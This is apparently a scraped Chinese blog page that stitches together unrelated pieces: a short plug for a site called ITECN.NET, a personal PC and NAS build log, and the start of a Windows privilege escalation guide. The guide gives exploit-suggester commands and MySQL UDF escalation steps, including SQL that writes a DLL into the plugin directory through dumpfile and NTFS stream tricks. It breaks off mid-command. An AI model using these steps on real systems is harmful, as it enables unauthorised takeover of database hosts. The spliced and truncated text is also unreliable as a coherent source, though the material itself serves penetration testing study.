最近发现的一个IT Pro的好网站

ITECN.NET,几位微软MVP共同打造,很好的学习圈子,喜欢交流ITPro技术的童鞋可以来玩玩~~~~~~~~~


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
来深圳已经有4个多月了,平时手边只有一台公司发的 Macbook Pro,根本不能愉快的游戏 加上之前用树莓派来做 NAS,百兆的网口和 USB 2.0 的速度根本不能满足需求… 所以一开始准备组一个 NAS,本来准备组个 J1900 啥的,结果因为偶尔还想撸撸 World of Warshits,所以干脆还是加钱上了 i3(i3 默秒全) 配置方面的话,用的最辣鸡的 7 代酷睿 i3 7100,默频高达 3.9G,简直就是 excited 啊! 主板方面自然是选得 B250 芯片组,因为个人对技嘉比较有好感,最后选的是 B250M-D3H 这款。一方面由于准备上 Micro-ATX 的机箱,所以只能挑小板;加上之前买的傻多戴 U2417H,最后发现这显示器只有 HDMI 和 DP(含 MiniDP) 两种接口,所以主板方面选了款带 DP / HDMI 输出的先用着。 内存方面在二手东上随便选了个 8G * 2 的套装(结果一直蓝屏,最后发现有一根抽了,联系京东上门换货,不得不说下二手东这个服务…简直了) 机箱的话选了一款铝制的 乔思伯 C3,还有喜闻乐见的大侧透(毕竟主板说他带了灯,感觉不上测透也浪费嘛),这款机箱虽然是 ITX / Micro-ATX 的,却可以使用标准 ATX 电源,这样方便了不少。 电源考虑到加显卡以及带多硬盘的需要,选了安钛克的 Neo ECO 550,毕竟之前也在用,接口够用,关键是不会爆炸。 另外因为主板有 M.2 接口,直接就上了块 256G 的爆炸星 PM961,插到主板上就行,不需要占机箱空间,毕竟现在装机 SSD 还是标配嘛。 最后把树莓派挂的那块 3T 的硬盘接了上去。 用了几个星期之后,偶尔打了把战舰世界,发现即使是低画质帧率也没法看。 唉,没办法,谁叫我们是辣鸡集显呢,于是权衡了下老黄的 1060 和偷电大师 RX
Windows提权总结(⼀) 提权总结(⼀)——数据库与系统漏洞 数据库与系统漏洞 Windows提权总结 提权总结(1)——数据库与系统漏洞 数据库与系统漏洞 0x01 内核漏洞提权 内核漏洞提权 Github上windows系统溢出漏洞提权的汇总: 内核漏洞检测⼯具——Windows-Exploit-Suggester 其主要功能是通过⽐对systeminfo⽣成的⽂件,⽐对KB编号,从⽽发现系统是否存在未修复漏洞。 使⽤: 更新数据库 python2 ./windows-exploit-suggester.py --update 安装依赖xlrd python2 -m pip install xlrd --upgrade 这⾥要注意,最近xlrd更新到了2.0.1版本,只⽀持.xls⽂件,与我们⽣成的数据库xlsx⽂件有冲突。 所以安装旧版xlrd: python2 -m pip uninstall xlrd python2 -m pip install xlrd==1.2.0 将利⽤的Windows机的SystemInfo打印到1.txt,执⾏以下命令 python2 ./windows-exploit-suggester.py --database ./2021-12-09-mssb.xls --systeminfo ./1.txt 利⽤给出的链接下载POC并提权 0x02 数据库提权 数据库提权 2.1 MYSQL提权 提权 2.1.1 UDF提权 提权 UDF (user defined function),即⽤户⾃定义函数。通过添加类似于命令执⾏的新函数,执⾏任意命令 提权条件: 有mysql的root权限以及secure_file_priv的值为空 mysql5.1以上有写lib/plugin⽬录权限 提权原理: 利⽤了root ⾼权限,创建带有调⽤cmd的函数的udf.dll动态链接库 Step1: 查看 secure_file_priv的值 show global variables like 'secure%'; 如果 secure_file_priv的值为NULL,则⽆法导⼊⽂件,也就⽆法提权。 secure_file_priv 的值不能通过set改变,需要在mysql配置⽂件my.ini中添加/修改 secure_file_priv='' 如果 secure_file_priv没有具体的值,则可以写⼊导出⽂件。 导⼊/导出成功 Step2: 查看plugin的值 select Host,user,plugin from mysql.user where user = substring_index(user(),'@',1); 当plugin值为 mysql_native_password 时可通过账户连接提权 Step3: 查看系统架构以及plugin⽬录 show variables like '%compile%'; #查看主机版本及架构 show variables like 'plugin%'; #查看 plugin ⽬录 64位 E:\phpStudy_64\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ 看架构的原因是要确定udf⽤64位还是32位的 在MSF中有: cd /usr/share/metasploit-framework/data/exploits/mysql/ 将对应的dll下载 Step4:将dll⽂件写⼊plugin⽬录,并且创建函数(如果没有"./mysql/lib/plugin/"这个⽬录,需要⾃⾏创建) 将整个DLL⽂件以⼗六进制编码后写⼊磁盘。 select 'It is dll' into dumpfile 'E:\\phpStudy_64\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib::$INDEX_ALLOCATION'; select 'It is dll' into dumpfile 'E:\\phpStudy_64\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin::$INDEX_ALLOCATION';(写⽬录,其实⼤部分时 候是没有写权限的) select hex(load_file('E:\\files\\udf\\udf64.dll')) into dumpfile '.\udf.hex'; select [⼗六进制值] into dumpfile "E:\\phpStudy_64\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf64

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值